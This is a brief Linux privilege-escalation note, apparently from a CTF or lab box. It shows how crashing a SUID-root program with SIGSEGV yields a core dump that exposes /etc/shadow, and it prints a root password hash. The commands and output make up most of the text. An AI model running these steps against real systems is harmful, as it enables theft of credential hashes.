Core Dump Technique

linux, privesc

Overview #

Attacker can force crash a program to generate a coredump so he can read the buffered data (eg/etc/shadow ) inside.

Environment #

-rwsr-xr-x 1 root root 17824 Oct  7 10:03 count*
prctl(PR_SET_DUMPABLE, 1);
dasith@secret:/opt$ cat /proc/sys/fs/suid_dumpable
2
dasith@secret:/opt$ 

Steps #

dasith@secret:/opt$ ./count 
Enter source file/directory name: /etc/shadow

Total characters = 1187
Total words      = 36
Total lines      = 36
Save results a file? [y/N]: 
dasith@secret:/opt$ ./count 
Enter source file/directory name: /etc/shadow

Total characters = 1187
Total words      = 36
Total lines      = 36
Save results a file? [y/N]: ^Z
[1]+  Stopped                 ./count
dasith@secret:/opt$ 
dasith@secret:/opt$ kill -SIGSEGV `pidof count`
dasith@secret:/opt$ fg
./count
Segmentation fault (core dumped)
dasith@secret:/opt$ ls -lrt /var/crash/
total 32
-rw-r----- 1 dasith dasith 28756 Dec 11 04:51 _opt_count.1000.crash
dasith@secret:/opt$ 
dasith@secret:/opt$ apport-unpack /var/crash/_opt_count.1000.crash /tmp/crash-report
dasith@secret:/opt$ strings /tmp/crash-report/CoreDump | grep root
root:$6$/0f5J.S8.u.dA78h$xSyDRhh5Zf18Ha9XNVo5dvPhxnI0i7D/uD8T5FcYgN1FYMQbvkZakMgjgm3bhtS6hgKWBcD/QJqPgQR6cycFj.:18873:0:99999:7:::
dasith@secret:/opt$ 

References #